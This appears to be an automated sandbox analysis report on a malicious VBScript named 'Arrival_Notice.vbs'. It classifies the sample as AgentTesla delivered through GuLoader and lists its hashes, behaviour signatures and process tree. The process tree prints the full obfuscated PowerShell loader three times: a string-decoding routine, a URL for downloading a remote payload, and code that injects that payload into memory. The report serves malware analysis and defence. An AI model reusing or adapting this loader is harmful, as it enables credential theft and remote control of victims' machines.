Analysis

  • max time kernel
    149s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22-09-2024 05:18

General

  • Target

    Arrival_Notice.vbs

  • Size

    43KB

  • MD5

    0e3295691efe2da3578ec4f544b89757

  • SHA1

    e3e3f0cf04401ffdf66168b9b21d1d3ad16b1372

  • SHA256

    27f470d48e6d73fcb325acd8abdf5df21eec5f6d6fb778dae97c88af683f97a1

  • SHA512

    f349edc63d02a00409aefbbe0858b01784ff84b14b300b8aff6659a7038207d35afbdfe3a55c2bc2406c8d150423636dd62f933323b30e5d5c47a46be66f8a13

  • SSDEEP

    768:B2M/cNHApz4hE6H7SjuZGkCa44m9DeEQWctNrjG5c8oHM73gPArGeqf57DDV7AE:QMixPbyda4VQnt1q53p73nNUnDV7AE

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Arrival_Notice.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2980
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fjernestes Arveloven meteorologs Anaesthetising unaccumulative Kkkenchefs Libertinernes #>;$Teodoro='guldurs';<#Kabuli Acidulated Vekseldrifter #>;$Minyans=$host.PrivateData;If ($Minyans) {$Halveredes++;}function Prvelsers($Overslowly){$Nanoinstructions=$Overslowly.Length-$Halveredes;for( $Towboat=4;$Towboat -lt $Nanoinstructions;$Towboat+=5){$Microseismicity250+=$Overslowly[$Towboat];}$Microseismicity250;}function Ajatsa($Signalisvvr){ &($Rambure) ($Signalisvvr);}$Juiceless=Prvelsers 'OverM .ndoBeskzChoni ChalVg ol LreaBort/Mend5 G.s.Rrat0In,u vari(DemiWTingiS ejnCr,cd SkroId.lwVernsTai unsN rojTHres Sprr1Ast 0outp.Niko0e,nr; d.s WorbWM sciBlefn Red6 Und4Gutt;Apog CombxKkk 6Kvab4humm;Urug Ov rrSmr vPe l: Dra1back2 S,a1Ins .Indi0 Eta)Vede SkibGLituePr acUdsakRuffoMaa /Sm a2 sud0Nat,1Tael0Timi0 .nt1Bob,0Z ka1F rt ictFBirkifa vrCente,adafha roWoodxFlo./Cub 1epi 2Pant1Proo.Sel 0Cren ';$Kinny=Prvelsers 'AdveUTrucS rafeSkinRP.id- konAPlaggForme,nken FljtFlor ';$hinderingly=Prvelsers 'A omhP,letUltrtApicpNivesNapi:In e/ Co./Traad ymnrPukkiTig,vVasseUdp..Commg epao ansoFeb g Gu l BadeLlau.RegecMaskoSju.mEpig/WomeuR.frcTvan?SolieF isxMon,pMateoWritrStattPaab=PoladhennoBo bwNedfn.ektlDecioSyllaDisodProp&Bef iNitrdRug = oto1K st2Tump7Tegn7Hvir-Multy Dag-LovgYVen b,rysxFootxDigtiBillARe sW Lam9V,deUStudaslgt0 CleRTaagaM,ng3FragrCof FFredGBr nWPhoeUFr mfCo.eBMi r3AnodIFinarT ttwS.arFAnv ';$Potentielle=Prvelsers 'Beto>Fang ';$Rambure=Prvelsers 'J.niiNediETerrXFlok ';$Strikkestrmpers='Abonnementsadministrationen';$Stillfoto = Prvelsers 'Re.reTelecSkruhen,ro Dis Sko %U voaRunhp S,rpNonddSerua ar tcalaa Dis%Spas\BastREjeneSibyfUndeu onrDublbtraniFinos Ggehbasim raeC ubnAsy tO.dr. narWNon aDelsrRege .aik& mbi& K,s Mel eSandc Ar hV lioPres PoltFina ';Ajatsa (Prvelsers 'Dups$aftvgFinvlunfioMedhb valaDecilYdes: ejFRiperShataAnsldKh erselva hasg k.reG afnSenndOvereVide1Per.1Port9 dri=Arau(.edscFn kmVulgdKise Des /fluoc Aus Fo.t$AnthSScr tSkagiDraelKlovlst.nf,occoUndet AnloShan)Se i ');Ajatsa (Prvelsers 'G,vl$currgPunklUntroMaanbDeraa ArtlTota: DismPrioiDisalWe vlPoucsThi tCliprFleie lgtaSt,fmFolk=P st$BanghRetri O enCoundSl peph.sr.ptei onnMystgEd,alteaty Amb.MushsScinpHvislTim i LintSc b(Hoar$JernPPeneoTermtfyrieLd enAn htbogai B.oePostlSt.sl Stae Spe)G un ');Ajatsa (Prvelsers 'Pans[BabyNQuineH kstQueb.KogeS WereSpagrF,ruv GlaiForuc,lime KonP T loCa.hiPrfenIndetArchM TilaRhodn jeraFrosg Twoe orsrVaan] Gil: Bon:MaivS bese vac kruu,enir Un iBalktAnkhy rudPAkkurR tioIndstForso BrdcU deoManhlLexi Fo h= lom Vde [FinaNstr eSundtFino. V,rSPr,reIndvcEsonuInh,r.obsifluetHemiyWaggPAsserMetaoOpl,t CasoKat c Unho GaslStanTSkkeyWashpNeige Bu ]Krit:n ns:V ntT P alAnnis Haf1Netk2 Vo. ');$hinderingly=$millstream[0];$Jarnut= (Prvelsers 'Styr$ MatGPolllRe pOAnt BApplAP rjLHadj:ToaavA brr DezD opIportA Strn .oaSByggt PlutWhipETavlLAddesCiceeTes,RPort=BinoNSno.e KarW O,e-K.ivOun,aBAdmijKontEGazuCRvetT Car KurSSk,lY posSAposTTonoeU.coM et. preNHexaE S oT Cup.Win WForeeC.ntBAdelCKulfl Smai.eone SounKonoT');$Jarnut+=$Fradragende119[1];Ajatsa ($Jarnut);Ajatsa (Prvelsers 'Ache$Pus,VPhysrflindsu.eiCrysa C.an Forsli htTenttImpae RetlC risMoise ncorG nn.OverHChryeDediaS ivdHandeOpdur arts bbo[ Scr$S,beKCataiLongn TurnFor yhaml]ensi=Gavf$Hal.Jj dauStraiB,ascEuloe ZoolKegseNulks AutsEkla ');$Underspilles=Prvelsers 'Masc$GrynVForkrSp,td,aleiTyktaHelvnOp as Re tAffetFiree inelFl msRheoeStetr,rop.RichDSproo S uwperbn Runl Uvuo GanaAntidOve,F Hy.i reflRealeNond(Sknd$SusphSt yi MisnDiptd ereAlacrSt riLavnnP chgPredlForsyInsp,,exe$AntiS Snoq EduuJudiid.cogSklmgHje lC.ikyBu l)Land ';$Squiggly=$Fradragende119[0];Ajatsa (Prvelsers ' ete$Th ngIde.lArthoF ltbCeylaDdtrl rig:J ckg esr ,mmNakvaS Af.eRenhoCommMPersRStakaSkraaTurnD PseeO ursPari= gon(Slant fulEUd,ls eadtAlco- etpAngaaProptSterH,old Mu.c$StorS TrlQFrgeuUd rIRenggPicnGPinal ParY For)esch ');while (!$grnseomraades) {Ajatsa (Prvelsers 'Gnis$KrnigUd,il UtvoSuscb.raeaSulkl ,ol: KerHCompu,nglsHvo hHu,rohetmlIndhd Hoon Sari OvenFilag MelsBrdnb Endusni dNeutgko,ue,rivtJulet Inde T dr MonnDolkeNonc= For$Pr,ut resrStimuPerie Bde ') ;Ajatsa $Underspilles;Ajatsa (Prvelsers 'RelaSSv.ntBlanaLi,grSylltZoo,- MisSKongl Trle None Waup tre Rest4Noni ');Ajatsa (Prvelsers ' tj$AndagTusnlAnt oSimsbSa.iaUd ylA,ta:InacgWeigrUnamnMeths.hareGango Dyrm Kulr roa,igtaFriedfldeeSkytsSpor=Stut(FremTAntieR desVar tbreg-DayaPNulpaK,oktBilthT lb Fja$arguS .erqDmriu astiAenag,arsgEntolhennyVeg ) Che ') ;Ajatsa (Prvelsers ' Pre$OxhegPl.pl ilioLuk,bNoncaT.fflslap:fattASjlenPipeaonangBa brHjlpaCarmmLin,mUdryaBorttBeg iLadesSkmme,ean=Tast$ CongPhy lGirdovaa,bFantawa dlRede:Oo.iDTrebePages SkdtDivoiMedil Shil.peraPovetKvinoAfdkrFunksSnaf+Frit+ Tal%,err$Di,imbloki AlllUdstlSkttsPaaatFluorUdmre diea S.amStat.D sdc kstoTuniuBo,nnVitrtSpil ') ;$hinderingly=$millstream[$Anagrammatise];}$hemicentrum=337280;$Jarrah=30086;Ajatsa (Prvelsers 'Hofs$Un,egSidelDy eoErstbParqaContlA.he:BharK AutoKopinbandt agsaOppokkomitBor a NonnEne.n tvoDom nGalvc leveOver Soro=Hast ,temGPaafeHa,dtTung-RedrC ildo MennOve.t ForeBon,nFuh tStat Ekst$SupiSFaarq rutuSot iKorrgBl,sgR.aeltestyDupp ');Ajatsa (Prvelsers ' uin$OvergfortlNattoOv rb.iscaKalil A,l: BalP TrtroveroUnb.tKoleo ,rgi UnsrUndeoRestnTorc Osto=Pali tele[CharSOppuyNamesQua.tBes eMicrmSlvp.ReceCSlbeoGepanR,davSteneMaanr indt and] oku:Ps c:Re aFAsker Ja,oSj smHedgB LanaInnlsPin,e,rib6Jero4Pa eSCo rt,razrLe ei .egnF togFejl(Frik$C nvKToksoTmrenJ,lotUnpraMan kcyprtOph.a MegnEmunn AutoOct.nSnogcSyn e Mas) Km. ');Ajatsa (Prvelsers 'Stik$Ny,ogUnfelaceto ,hrb TetaSilllTeen:Equac.krii linrBr tcEmbluSessmStrimBackiAlmigformr K aaPak.tSecyirenkoElecnN.ur Hype=L ng Afbu[,rdrSAnstyPreisStritBeldeLuksmSuge.ElecTNusseSp lxEruptLegi.ProdE NonnHolocCensoOutcdCephiG nkn BorgDisb]Laur:A,er: TreA Fe S U mCMellIMiddIUafs.straGLaune UdttU,drSUnpatBotcrFedeiEjekn regGali(Mark$D.skPEnd,rEuthoFat tEfteoO coiInsur.renoUdlinDa a) M.t ');Ajatsa (Prvelsers ' Hap$KastgLys.lU deo BegbSoigaGewglO,er:Un fS kiluReytpOranpQuenl Chae tim Io,eOpslnUnavt SnovBrokiSvinnGonikSe,alDetaeStikn EggsDi i=Head$ Couc Flyi OrdrStatc peuParam RegmskraiCarpg ierVirua FlutD mfielevoEelen Mar.tactsCu,auAfspb.ardsIne,t Pa r,ordi PsenUnt.gElec(Frac$BanehPoloeIsolm Dani Aabc ToaeKonsn C ptRu hrFormuForzmBven,Unsh$Old JAdawaFrydrInturStitaUnnihLa o),ros ');Ajatsa $Supplementvinklens;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Refurbishment.War && echo t"
        3⤵
          PID:2888
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Fjernestes Arveloven meteorologs Anaesthetising unaccumulative Kkkenchefs Libertinernes #>;$Teodoro='guldurs';<#Kabuli Acidulated Vekseldrifter #>;$Minyans=$host.PrivateData;If ($Minyans) {$Halveredes++;}function Prvelsers($Overslowly){$Nanoinstructions=$Overslowly.Length-$Halveredes;for( $Towboat=4;$Towboat -lt $Nanoinstructions;$Towboat+=5){$Microseismicity250+=$Overslowly[$Towboat];}$Microseismicity250;}function Ajatsa($Signalisvvr){ &($Rambure) ($Signalisvvr);}$Juiceless=Prvelsers 'OverM .ndoBeskzChoni ChalVg ol LreaBort/Mend5 G.s.Rrat0In,u vari(DemiWTingiS ejnCr,cd SkroId.lwVernsTai unsN rojTHres Sprr1Ast 0outp.Niko0e,nr; d.s WorbWM sciBlefn Red6 Und4Gutt;Apog CombxKkk 6Kvab4humm;Urug Ov rrSmr vPe l: Dra1back2 S,a1Ins .Indi0 Eta)Vede SkibGLituePr acUdsakRuffoMaa /Sm a2 sud0Nat,1Tael0Timi0 .nt1Bob,0Z ka1F rt ictFBirkifa vrCente,adafha roWoodxFlo./Cub 1epi 2Pant1Proo.Sel 0Cren ';$Kinny=Prvelsers 'AdveUTrucS rafeSkinRP.id- konAPlaggForme,nken FljtFlor ';$hinderingly=Prvelsers 'A omhP,letUltrtApicpNivesNapi:In e/ Co./Traad ymnrPukkiTig,vVasseUdp..Commg epao ansoFeb g Gu l BadeLlau.RegecMaskoSju.mEpig/WomeuR.frcTvan?SolieF isxMon,pMateoWritrStattPaab=PoladhennoBo bwNedfn.ektlDecioSyllaDisodProp&Bef iNitrdRug = oto1K st2Tump7Tegn7Hvir-Multy Dag-LovgYVen b,rysxFootxDigtiBillARe sW Lam9V,deUStudaslgt0 CleRTaagaM,ng3FragrCof FFredGBr nWPhoeUFr mfCo.eBMi r3AnodIFinarT ttwS.arFAnv ';$Potentielle=Prvelsers 'Beto>Fang ';$Rambure=Prvelsers 'J.niiNediETerrXFlok ';$Strikkestrmpers='Abonnementsadministrationen';$Stillfoto = Prvelsers 'Re.reTelecSkruhen,ro Dis Sko %U voaRunhp S,rpNonddSerua ar tcalaa Dis%Spas\BastREjeneSibyfUndeu onrDublbtraniFinos Ggehbasim raeC ubnAsy tO.dr. narWNon aDelsrRege .aik& mbi& K,s Mel eSandc Ar hV lioPres PoltFina ';Ajatsa (Prvelsers 'Dups$aftvgFinvlunfioMedhb valaDecilYdes: ejFRiperShataAnsldKh erselva hasg k.reG afnSenndOvereVide1Per.1Port9 dri=Arau(.edscFn kmVulgdKise Des /fluoc Aus Fo.t$AnthSScr tSkagiDraelKlovlst.nf,occoUndet AnloShan)Se i ');Ajatsa (Prvelsers 'G,vl$currgPunklUntroMaanbDeraa ArtlTota: DismPrioiDisalWe vlPoucsThi tCliprFleie lgtaSt,fmFolk=P st$BanghRetri O enCoundSl peph.sr.ptei onnMystgEd,alteaty Amb.MushsScinpHvislTim i LintSc b(Hoar$JernPPeneoTermtfyrieLd enAn htbogai B.oePostlSt.sl Stae Spe)G un ');Ajatsa (Prvelsers 'Pans[BabyNQuineH kstQueb.KogeS WereSpagrF,ruv GlaiForuc,lime KonP T loCa.hiPrfenIndetArchM TilaRhodn jeraFrosg Twoe orsrVaan] Gil: Bon:MaivS bese vac kruu,enir Un iBalktAnkhy rudPAkkurR tioIndstForso BrdcU deoManhlLexi Fo h= lom Vde [FinaNstr eSundtFino. V,rSPr,reIndvcEsonuInh,r.obsifluetHemiyWaggPAsserMetaoOpl,t CasoKat c Unho GaslStanTSkkeyWashpNeige Bu ]Krit:n ns:V ntT P alAnnis Haf1Netk2 Vo. ');$hinderingly=$millstream[0];$Jarnut= (Prvelsers 'Styr$ MatGPolllRe pOAnt BApplAP rjLHadj:ToaavA brr DezD opIportA Strn .oaSByggt PlutWhipETavlLAddesCiceeTes,RPort=BinoNSno.e KarW O,e-K.ivOun,aBAdmijKontEGazuCRvetT Car KurSSk,lY posSAposTTonoeU.coM et. preNHexaE S oT Cup.Win WForeeC.ntBAdelCKulfl Smai.eone SounKonoT');$Jarnut+=$Fradragende119[1];Ajatsa ($Jarnut);Ajatsa (Prvelsers 'Ache$Pus,VPhysrflindsu.eiCrysa C.an Forsli htTenttImpae RetlC risMoise ncorG nn.OverHChryeDediaS ivdHandeOpdur arts bbo[ Scr$S,beKCataiLongn TurnFor yhaml]ensi=Gavf$Hal.Jj dauStraiB,ascEuloe ZoolKegseNulks AutsEkla ');$Underspilles=Prvelsers 'Masc$GrynVForkrSp,td,aleiTyktaHelvnOp as Re tAffetFiree inelFl msRheoeStetr,rop.RichDSproo S uwperbn Runl Uvuo GanaAntidOve,F Hy.i reflRealeNond(Sknd$SusphSt yi MisnDiptd ereAlacrSt riLavnnP chgPredlForsyInsp,,exe$AntiS Snoq EduuJudiid.cogSklmgHje lC.ikyBu l)Land ';$Squiggly=$Fradragende119[0];Ajatsa (Prvelsers ' ete$Th ngIde.lArthoF ltbCeylaDdtrl rig:J ckg esr ,mmNakvaS Af.eRenhoCommMPersRStakaSkraaTurnD PseeO ursPari= gon(Slant fulEUd,ls eadtAlco- etpAngaaProptSterH,old Mu.c$StorS TrlQFrgeuUd rIRenggPicnGPinal ParY For)esch ');while (!$grnseomraades) {Ajatsa (Prvelsers 'Gnis$KrnigUd,il UtvoSuscb.raeaSulkl ,ol: KerHCompu,nglsHvo hHu,rohetmlIndhd Hoon Sari OvenFilag MelsBrdnb Endusni dNeutgko,ue,rivtJulet Inde T dr MonnDolkeNonc= For$Pr,ut resrStimuPerie Bde ') ;Ajatsa $Underspilles;Ajatsa (Prvelsers 'RelaSSv.ntBlanaLi,grSylltZoo,- MisSKongl Trle None Waup tre Rest4Noni ');Ajatsa (Prvelsers ' tj$AndagTusnlAnt oSimsbSa.iaUd ylA,ta:InacgWeigrUnamnMeths.hareGango Dyrm Kulr roa,igtaFriedfldeeSkytsSpor=Stut(FremTAntieR desVar tbreg-DayaPNulpaK,oktBilthT lb Fja$arguS .erqDmriu astiAenag,arsgEntolhennyVeg ) Che ') ;Ajatsa (Prvelsers ' Pre$OxhegPl.pl ilioLuk,bNoncaT.fflslap:fattASjlenPipeaonangBa brHjlpaCarmmLin,mUdryaBorttBeg iLadesSkmme,ean=Tast$ CongPhy lGirdovaa,bFantawa dlRede:Oo.iDTrebePages SkdtDivoiMedil Shil.peraPovetKvinoAfdkrFunksSnaf+Frit+ Tal%,err$Di,imbloki AlllUdstlSkttsPaaatFluorUdmre diea S.amStat.D sdc kstoTuniuBo,nnVitrtSpil ') ;$hinderingly=$millstream[$Anagrammatise];}$hemicentrum=337280;$Jarrah=30086;Ajatsa (Prvelsers 'Hofs$Un,egSidelDy eoErstbParqaContlA.he:BharK AutoKopinbandt agsaOppokkomitBor a NonnEne.n tvoDom nGalvc leveOver Soro=Hast ,temGPaafeHa,dtTung-RedrC ildo MennOve.t ForeBon,nFuh tStat Ekst$SupiSFaarq rutuSot iKorrgBl,sgR.aeltestyDupp ');Ajatsa (Prvelsers ' uin$OvergfortlNattoOv rb.iscaKalil A,l: BalP TrtroveroUnb.tKoleo ,rgi UnsrUndeoRestnTorc Osto=Pali tele[CharSOppuyNamesQua.tBes eMicrmSlvp.ReceCSlbeoGepanR,davSteneMaanr indt and] oku:Ps c:Re aFAsker Ja,oSj smHedgB LanaInnlsPin,e,rib6Jero4Pa eSCo rt,razrLe ei .egnF togFejl(Frik$C nvKToksoTmrenJ,lotUnpraMan kcyprtOph.a MegnEmunn AutoOct.nSnogcSyn e Mas) Km. ');Ajatsa (Prvelsers 'Stik$Ny,ogUnfelaceto ,hrb TetaSilllTeen:Equac.krii linrBr tcEmbluSessmStrimBackiAlmigformr K aaPak.tSecyirenkoElecnN.ur Hype=L ng Afbu[,rdrSAnstyPreisStritBeldeLuksmSuge.ElecTNusseSp lxEruptLegi.ProdE NonnHolocCensoOutcdCephiG nkn BorgDisb]Laur:A,er: TreA Fe S U mCMellIMiddIUafs.straGLaune UdttU,drSUnpatBotcrFedeiEjekn regGali(Mark$D.skPEnd,rEuthoFat tEfteoO coiInsur.renoUdlinDa a) M.t ');Ajatsa (Prvelsers ' Hap$KastgLys.lU deo BegbSoigaGewglO,er:Un fS kiluReytpOranpQuenl Chae tim Io,eOpslnUnavt SnovBrokiSvinnGonikSe,alDetaeStikn EggsDi i=Head$ Couc Flyi OrdrStatc peuParam RegmskraiCarpg ierVirua FlutD mfielevoEelen Mar.tactsCu,auAfspb.ardsIne,t Pa r,ordi PsenUnt.gElec(Frac$BanehPoloeIsolm Dani Aabc ToaeKonsn C ptRu hrFormuForzmBven,Unsh$Old JAdawaFrydrInturStitaUnnihLa o),ros ');Ajatsa $Supplementvinklens;"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2512
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Fjernestes Arveloven meteorologs Anaesthetising unaccumulative Kkkenchefs Libertinernes #>;$Teodoro='guldurs';<#Kabuli Acidulated Vekseldrifter #>;$Minyans=$host.PrivateData;If ($Minyans) {$Halveredes++;}function Prvelsers($Overslowly){$Nanoinstructions=$Overslowly.Length-$Halveredes;for( $Towboat=4;$Towboat -lt $Nanoinstructions;$Towboat+=5){$Microseismicity250+=$Overslowly[$Towboat];}$Microseismicity250;}function Ajatsa($Signalisvvr){ &($Rambure) ($Signalisvvr);}$Juiceless=Prvelsers 'OverM .ndoBeskzChoni ChalVg ol LreaBort/Mend5 G.s.Rrat0In,u vari(DemiWTingiS ejnCr,cd SkroId.lwVernsTai unsN rojTHres Sprr1Ast 0outp.Niko0e,nr; d.s WorbWM sciBlefn Red6 Und4Gutt;Apog CombxKkk 6Kvab4humm;Urug Ov rrSmr vPe l: Dra1back2 S,a1Ins .Indi0 Eta)Vede SkibGLituePr acUdsakRuffoMaa /Sm a2 sud0Nat,1Tael0Timi0 .nt1Bob,0Z ka1F rt ictFBirkifa vrCente,adafha roWoodxFlo./Cub 1epi 2Pant1Proo.Sel 0Cren ';$Kinny=Prvelsers 'AdveUTrucS rafeSkinRP.id- konAPlaggForme,nken FljtFlor ';$hinderingly=Prvelsers 'A omhP,letUltrtApicpNivesNapi:In e/ Co./Traad ymnrPukkiTig,vVasseUdp..Commg epao ansoFeb g Gu l BadeLlau.RegecMaskoSju.mEpig/WomeuR.frcTvan?SolieF isxMon,pMateoWritrStattPaab=PoladhennoBo bwNedfn.ektlDecioSyllaDisodProp&Bef iNitrdRug = oto1K st2Tump7Tegn7Hvir-Multy Dag-LovgYVen b,rysxFootxDigtiBillARe sW Lam9V,deUStudaslgt0 CleRTaagaM,ng3FragrCof FFredGBr nWPhoeUFr mfCo.eBMi r3AnodIFinarT ttwS.arFAnv ';$Potentielle=Prvelsers 'Beto>Fang ';$Rambure=Prvelsers 'J.niiNediETerrXFlok ';$Strikkestrmpers='Abonnementsadministrationen';$Stillfoto = Prvelsers 'Re.reTelecSkruhen,ro Dis Sko %U voaRunhp S,rpNonddSerua ar tcalaa Dis%Spas\BastREjeneSibyfUndeu onrDublbtraniFinos Ggehbasim raeC ubnAsy tO.dr. narWNon aDelsrRege .aik& mbi& K,s Mel eSandc Ar hV lioPres PoltFina ';Ajatsa (Prvelsers 'Dups$aftvgFinvlunfioMedhb valaDecilYdes: ejFRiperShataAnsldKh erselva hasg k.reG afnSenndOvereVide1Per.1Port9 dri=Arau(.edscFn kmVulgdKise Des /fluoc Aus Fo.t$AnthSScr tSkagiDraelKlovlst.nf,occoUndet AnloShan)Se i ');Ajatsa (Prvelsers 'G,vl$currgPunklUntroMaanbDeraa ArtlTota: DismPrioiDisalWe vlPoucsThi tCliprFleie lgtaSt,fmFolk=P st$BanghRetri O enCoundSl peph.sr.ptei onnMystgEd,alteaty Amb.MushsScinpHvislTim i LintSc b(Hoar$JernPPeneoTermtfyrieLd enAn htbogai B.oePostlSt.sl Stae Spe)G un ');Ajatsa (Prvelsers 'Pans[BabyNQuineH kstQueb.KogeS WereSpagrF,ruv GlaiForuc,lime KonP T loCa.hiPrfenIndetArchM TilaRhodn jeraFrosg Twoe orsrVaan] Gil: Bon:MaivS bese vac kruu,enir Un iBalktAnkhy rudPAkkurR tioIndstForso BrdcU deoManhlLexi Fo h= lom Vde [FinaNstr eSundtFino. V,rSPr,reIndvcEsonuInh,r.obsifluetHemiyWaggPAsserMetaoOpl,t CasoKat c Unho GaslStanTSkkeyWashpNeige Bu ]Krit:n ns:V ntT P alAnnis Haf1Netk2 Vo. ');$hinderingly=$millstream[0];$Jarnut= (Prvelsers 'Styr$ MatGPolllRe pOAnt BApplAP rjLHadj:ToaavA brr DezD opIportA Strn .oaSByggt PlutWhipETavlLAddesCiceeTes,RPort=BinoNSno.e KarW O,e-K.ivOun,aBAdmijKontEGazuCRvetT Car KurSSk,lY posSAposTTonoeU.coM et. preNHexaE S oT Cup.Win WForeeC.ntBAdelCKulfl Smai.eone SounKonoT');$Jarnut+=$Fradragende119[1];Ajatsa ($Jarnut);Ajatsa (Prvelsers 'Ache$Pus,VPhysrflindsu.eiCrysa C.an Forsli htTenttImpae RetlC risMoise ncorG nn.OverHChryeDediaS ivdHandeOpdur arts bbo[ Scr$S,beKCataiLongn TurnFor yhaml]ensi=Gavf$Hal.Jj dauStraiB,ascEuloe ZoolKegseNulks AutsEkla ');$Underspilles=Prvelsers 'Masc$GrynVForkrSp,td,aleiTyktaHelvnOp as Re tAffetFiree inelFl msRheoeStetr,rop.RichDSproo S uwperbn Runl Uvuo GanaAntidOve,F Hy.i reflRealeNond(Sknd$SusphSt yi MisnDiptd ereAlacrSt riLavnnP chgPredlForsyInsp,,exe$AntiS Snoq EduuJudiid.cogSklmgHje lC.ikyBu l)Land ';$Squiggly=$Fradragende119[0];Ajatsa (Prvelsers ' ete$Th ngIde.lArthoF ltbCeylaDdtrl rig:J ckg esr ,mmNakvaS Af.eRenhoCommMPersRStakaSkraaTurnD PseeO ursPari= gon(Slant fulEUd,ls eadtAlco- etpAngaaProptSterH,old Mu.c$StorS TrlQFrgeuUd rIRenggPicnGPinal ParY For)esch ');while (!$grnseomraades) {Ajatsa (Prvelsers 'Gnis$KrnigUd,il UtvoSuscb.raeaSulkl ,ol: KerHCompu,nglsHvo hHu,rohetmlIndhd Hoon Sari OvenFilag MelsBrdnb Endusni dNeutgko,ue,rivtJulet Inde T dr MonnDolkeNonc= For$Pr,ut resrStimuPerie Bde ') ;Ajatsa $Underspilles;Ajatsa (Prvelsers 'RelaSSv.ntBlanaLi,grSylltZoo,- MisSKongl Trle None Waup tre Rest4Noni ');Ajatsa (Prvelsers ' tj$AndagTusnlAnt oSimsbSa.iaUd ylA,ta:InacgWeigrUnamnMeths.hareGango Dyrm Kulr roa,igtaFriedfldeeSkytsSpor=Stut(FremTAntieR desVar tbreg-DayaPNulpaK,oktBilthT lb Fja$arguS .erqDmriu astiAenag,arsgEntolhennyVeg ) Che ') ;Ajatsa (Prvelsers ' Pre$OxhegPl.pl ilioLuk,bNoncaT.fflslap:fattASjlenPipeaonangBa brHjlpaCarmmLin,mUdryaBorttBeg iLadesSkmme,ean=Tast$ CongPhy lGirdovaa,bFantawa dlRede:Oo.iDTrebePages SkdtDivoiMedil Shil.peraPovetKvinoAfdkrFunksSnaf+Frit+ Tal%,err$Di,imbloki AlllUdstlSkttsPaaatFluorUdmre diea S.amStat.D sdc kstoTuniuBo,nnVitrtSpil ') ;$hinderingly=$millstream[$Anagrammatise];}$hemicentrum=337280;$Jarrah=30086;Ajatsa (Prvelsers 'Hofs$Un,egSidelDy eoErstbParqaContlA.he:BharK AutoKopinbandt agsaOppokkomitBor a NonnEne.n tvoDom nGalvc leveOver Soro=Hast ,temGPaafeHa,dtTung-RedrC ildo MennOve.t ForeBon,nFuh tStat Ekst$SupiSFaarq rutuSot iKorrgBl,sgR.aeltestyDupp ');Ajatsa (Prvelsers ' uin$OvergfortlNattoOv rb.iscaKalil A,l: BalP TrtroveroUnb.tKoleo ,rgi UnsrUndeoRestnTorc Osto=Pali tele[CharSOppuyNamesQua.tBes eMicrmSlvp.ReceCSlbeoGepanR,davSteneMaanr indt and] oku:Ps c:Re aFAsker Ja,oSj smHedgB LanaInnlsPin,e,rib6Jero4Pa eSCo rt,razrLe ei .egnF togFejl(Frik$C nvKToksoTmrenJ,lotUnpraMan kcyprtOph.a MegnEmunn AutoOct.nSnogcSyn e Mas) Km. ');Ajatsa (Prvelsers 'Stik$Ny,ogUnfelaceto ,hrb TetaSilllTeen:Equac.krii linrBr tcEmbluSessmStrimBackiAlmigformr K aaPak.tSecyirenkoElecnN.ur Hype=L ng Afbu[,rdrSAnstyPreisStritBeldeLuksmSuge.ElecTNusseSp lxEruptLegi.ProdE NonnHolocCensoOutcdCephiG nkn BorgDisb]Laur:A,er: TreA Fe S U mCMellIMiddIUafs.straGLaune UdttU,drSUnpatBotcrFedeiEjekn regGali(Mark$D.skPEnd,rEuthoFat tEfteoO coiInsur.renoUdlinDa a) M.t ');Ajatsa (Prvelsers ' Hap$KastgLys.lU deo BegbSoigaGewglO,er:Un fS kiluReytpOranpQuenl Chae tim Io,eOpslnUnavt SnovBrokiSvinnGonikSe,alDetaeStikn EggsDi i=Head$ Couc Flyi OrdrStatc peuParam RegmskraiCarpg ierVirua FlutD mfielevoEelen Mar.tactsCu,auAfspb.ardsIne,t Pa r,ordi PsenUnt.gElec(Frac$BanehPoloeIsolm Dani Aabc ToaeKonsn C ptRu hrFormuForzmBven,Unsh$Old JAdawaFrydrInturStitaUnnihLa o),ros ');Ajatsa $Supplementvinklens;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2520
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Refurbishment.War && echo t"
              5⤵
